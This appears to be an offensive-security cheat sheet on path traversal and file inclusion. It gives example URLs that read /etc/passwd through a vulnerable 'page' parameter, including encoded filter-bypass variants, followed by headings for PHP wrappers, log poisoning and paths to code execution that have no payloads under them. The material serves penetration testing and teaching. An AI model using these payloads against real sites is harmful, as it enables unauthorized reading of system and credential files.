Path traversal & LFI/RFI
Basic path traversal
http://website.com/index.php?page=../../../etc/passwdInside the same directory
http://website.com/index.php?page=dir1/dir2/../../../../../etc/passwdFilter Bypass
Encoding
http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=....%c0%af//....%c0%af....//%c0%afetc%c0%afpasswdPath truncation
Remote file inclusion
Wrappers
Wrapper php://filter
Base64 and rot13
zlib (compression)
Wrapper zip://
Wrapper data://
Wrapper expect://
Wrapper input://
Wrapper phar://
Wrapper Input
LFI->RCE
Log Poisoning
Via Email
Via /proc/*/fd/*
Via /proc/self/environ
Via upload
Via Zip fie upload
Via PHP sessions
Via ssh
Wordpress
FLASK Template Injection
Last updated